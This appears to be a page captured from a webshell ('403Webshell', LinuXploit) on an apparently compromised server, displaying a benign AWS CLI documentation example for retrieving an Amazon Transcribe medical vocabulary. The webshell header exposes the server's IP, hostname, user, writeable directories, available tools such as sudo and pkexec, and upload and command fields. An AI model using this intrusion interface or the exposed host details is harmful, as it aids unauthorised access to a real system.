403Webshell
Server IP : 167.99.254.82  /  Your IP : 216.73.216.188
Web Server : Apache
System : Linux host.techisquad.com 5.15.0-190-generic #200-Ubuntu SMP Fri Aug 7 15:06:04 UTC 2026 x86_64
User : pawluxera ( 1011)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/doc/awscli/examples/transcribe/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/doc/awscli/examples/transcribe/get-medical-vocabulary.rst
**To get information about a medical custom vocabulary**

The following ``get-medical-vocabulary`` example gets information on a medical custom vocabulary. You can use the VocabularyState parameter to see the processing state of the vocabulary. If it's READY, you can use it in the StartMedicalTranscriptionJob operation.::

    aws transcribe get-medical-vocabulary \
        --vocabulary-name medical-vocab-example

Output::

    {
        "VocabularyName": "medical-vocab-example",
        "LanguageCode": "en-US",
        "VocabularyState": "READY",
        "LastModifiedTime": "2020-09-19T23:59:04.349000+00:00",
        "DownloadUri": "https://link-to-download-the-text-file-used-to-create-your-medical-custom-vocabulary"
    }

For more information, see `Medical Custom Vocabularies <https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html>`__ in the *Amazon Transcribe Developer Guide*.

Youez - 2016 - github.com/yon3zu
LinuXploit